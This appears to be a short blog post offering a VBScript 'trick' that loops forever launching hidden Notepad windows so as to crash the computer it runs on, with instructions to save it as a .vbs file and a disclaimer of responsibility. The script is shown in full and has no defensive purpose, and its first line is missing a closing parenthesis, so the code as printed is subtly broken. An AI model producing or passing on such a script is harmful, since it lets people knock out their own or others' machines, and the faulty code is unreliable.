Open notepad type the following CODE and save it as anyname.vbs
This program will infinitely open notepad in hidden mode causing your
system to crash...!
the value "0" in the third line specifies the mode in which the application
should run here it is hidden mode.
╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦
set ws=CreateObject("wscript.shell"
do
ws.run "notepad",0
loop
=======================================
Warning : Author are not responsible to any damages caused by this codes so use it
on ur own Risk.
0 comments:
Post a Comment